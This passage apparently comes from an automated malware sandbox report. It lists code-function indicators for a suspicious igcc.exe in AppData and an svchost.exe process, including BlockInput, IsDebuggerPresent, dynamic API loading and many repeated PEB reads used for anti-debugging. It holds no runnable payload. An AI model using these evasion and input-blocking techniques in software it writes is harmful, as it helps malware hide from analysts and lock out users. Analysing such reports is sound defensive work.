                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00417B23 LdrLoadDll,13_2_00417B23
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00083F09 BlockInput,12_2_00083F09
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00013B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00013B3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00045A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_00045A7C
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00014B37 LoadLibraryA,GetProcAddress,12_2_00014B37
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_01455460 mov eax, dword ptr fs:[00000030h]12_2_01455460
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_01455400 mov eax, dword ptr fs:[00000030h]12_2_01455400
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_01453E30 mov eax, dword ptr fs:[00000030h]12_2_01453E30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A533A5 mov eax, dword ptr fs:[00000030h]13_2_03A533A5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A633A0 mov eax, dword ptr fs:[00000030h]13_2_03A633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A633A0 mov eax, dword ptr fs:[00000030h]13_2_03A633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2E388 mov eax, dword ptr fs:[00000030h]13_2_03A2E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2E388 mov eax, dword ptr fs:[00000030h]13_2_03A2E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2E388 mov eax, dword ptr fs:[00000030h]13_2_03A2E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5438F mov eax, dword ptr fs:[00000030h]13_2_03A5438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5438F mov eax, dword ptr fs:[00000030h]13_2_03A5438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B0539D mov eax, dword ptr fs:[00000030h]13_2_03B0539D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A8739A mov eax, dword ptr fs:[00000030h]13_2_03A8739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A8739A mov eax, dword ptr fs:[00000030h]13_2_03A8739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A28397 mov eax, dword ptr fs:[00000030h]13_2_03A28397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A28397 mov eax, dword ptr fs:[00000030h]13_2_03A28397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A28397 mov eax, dword ptr fs:[00000030h]13_2_03A28397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF3E6 mov eax, dword ptr fs:[00000030h]13_2_03AEF3E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B053FC mov eax, dword ptr fs:[00000030h]13_2_03B053FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A403E9 mov eax, dword ptr fs:[00000030h]13_2_03A403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]13_2_03A4E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]13_2_03A4E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]13_2_03A4E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A663FF mov eax, dword ptr fs:[00000030h]13_2_03A663FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEC3CD mov eax, dword ptr fs:[00000030h]13_2_03AEC3CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]13_2_03A3A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A383C0 mov eax, dword ptr fs:[00000030h]13_2_03A383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A383C0 mov eax, dword ptr fs:[00000030h]13_2_03A383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A383C0 mov eax, dword ptr fs:[00000030h]13_2_03A383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A383C0 mov eax, dword ptr fs:[00000030h]13_2_03A383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h]13_2_03AEB3D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF132D mov eax, dword ptr fs:[00000030h]13_2_03AF132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF132D mov eax, dword ptr fs:[00000030h]13_2_03AF132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5F32A mov eax, dword ptr fs:[00000030h]13_2_03A5F32A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A27330 mov eax, dword ptr fs:[00000030h]13_2_03A27330
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB930B mov eax, dword ptr fs:[00000030h]13_2_03AB930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB930B mov eax, dword ptr fs:[00000030h]13_2_03AB930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB930B mov eax, dword ptr fs:[00000030h]13_2_03AB930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A30B mov eax, dword ptr fs:[00000030h]13_2_03A6A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A30B mov eax, dword ptr fs:[00000030h]13_2_03A6A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6A30B mov eax, dword ptr fs:[00000030h]13_2_03A6A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C310 mov ecx, dword ptr fs:[00000030h]13_2_03A2C310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A50310 mov ecx, dword ptr fs:[00000030h]13_2_03A50310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF367 mov eax, dword ptr fs:[00000030h]13_2_03AEF367
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AD437C mov eax, dword ptr fs:[00000030h]13_2_03AD437C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37370 mov eax, dword ptr fs:[00000030h]13_2_03A37370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37370 mov eax, dword ptr fs:[00000030h]13_2_03A37370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37370 mov eax, dword ptr fs:[00000030h]13_2_03A37370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB2349 mov eax, dword ptr fs:[00000030h]13_2_03AB2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D34C mov eax, dword ptr fs:[00000030h]13_2_03A2D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D34C mov eax, dword ptr fs:[00000030h]13_2_03A2D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05341 mov eax, dword ptr fs:[00000030h]13_2_03B05341
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29353 mov eax, dword ptr fs:[00000030h]13_2_03A29353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29353 mov eax, dword ptr fs:[00000030h]13_2_03A29353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov ecx, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB035C mov eax, dword ptr fs:[00000030h]13_2_03AB035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFA352 mov eax, dword ptr fs:[00000030h]13_2_03AFA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402A0 mov eax, dword ptr fs:[00000030h]13_2_03A402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402A0 mov eax, dword ptr fs:[00000030h]13_2_03A402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A452A0 mov eax, dword ptr fs:[00000030h]13_2_03A452A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF92A6 mov eax, dword ptr fs:[00000030h]13_2_03AF92A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC62A0 mov eax, dword ptr fs:[00000030h]13_2_03AC62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC72A0 mov eax, dword ptr fs:[00000030h]13_2_03AC72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC72A0 mov eax, dword ptr fs:[00000030h]13_2_03AC72A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov eax, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov eax, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov ecx, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB92BC mov ecx, dword ptr fs:[00000030h]13_2_03AB92BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E284 mov eax, dword ptr fs:[00000030h]13_2_03A6E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6E284 mov eax, dword ptr fs:[00000030h]13_2_03A6E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB0283 mov eax, dword ptr fs:[00000030h]13_2_03AB0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05283 mov eax, dword ptr fs:[00000030h]13_2_03B05283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6329E mov eax, dword ptr fs:[00000030h]13_2_03A6329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6329E mov eax, dword ptr fs:[00000030h]13_2_03A6329E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE12ED mov eax, dword ptr fs:[00000030h]13_2_03AE12ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A402E1 mov eax, dword ptr fs:[00000030h]13_2_03A402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B052E2 mov eax, dword ptr fs:[00000030h]13_2_03B052E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]13_2_03AEF2F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A292FF mov eax, dword ptr fs:[00000030h]13_2_03A292FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]13_2_03A3A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]13_2_03A5B2C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A392C5 mov eax, dword ptr fs:[00000030h]13_2_03A392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A392C5 mov eax, dword ptr fs:[00000030h]13_2_03A392C5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]13_2_03A2B2D3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]13_2_03A5F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]13_2_03A5F2D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05227 mov eax, dword ptr fs:[00000030h]13_2_03B05227
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2823B mov eax, dword ptr fs:[00000030h]13_2_03A2823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A67208 mov eax, dword ptr fs:[00000030h]13_2_03A67208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A67208 mov eax, dword ptr fs:[00000030h]13_2_03A67208
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A34260 mov eax, dword ptr fs:[00000030h]13_2_03A34260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFD26B mov eax, dword ptr fs:[00000030h]13_2_03AFD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AFD26B mov eax, dword ptr fs:[00000030h]13_2_03AFD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2826B mov eax, dword ptr fs:[00000030h]13_2_03A2826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A59274 mov eax, dword ptr fs:[00000030h]13_2_03A59274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A71270 mov eax, dword ptr fs:[00000030h]13_2_03A71270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A71270 mov eax, dword ptr fs:[00000030h]13_2_03A71270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE0274 mov eax, dword ptr fs:[00000030h]13_2_03AE0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29240 mov eax, dword ptr fs:[00000030h]13_2_03A29240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29240 mov eax, dword ptr fs:[00000030h]13_2_03A29240
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6724D mov eax, dword ptr fs:[00000030h]13_2_03A6724D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A250 mov eax, dword ptr fs:[00000030h]13_2_03A2A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEB256 mov eax, dword ptr fs:[00000030h]13_2_03AEB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEB256 mov eax, dword ptr fs:[00000030h]13_2_03AEB256
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36259 mov eax, dword ptr fs:[00000030h]13_2_03A36259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AE11A4 mov eax, dword ptr fs:[00000030h]13_2_03AE11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]13_2_03A4B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A70185 mov eax, dword ptr fs:[00000030h]13_2_03A70185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEC188 mov eax, dword ptr fs:[00000030h]13_2_03AEC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AEC188 mov eax, dword ptr fs:[00000030h]13_2_03AEC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AB019F mov eax, dword ptr fs:[00000030h]13_2_03AB019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A197 mov eax, dword ptr fs:[00000030h]13_2_03A2A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A551EF mov eax, dword ptr fs:[00000030h]13_2_03A551EF
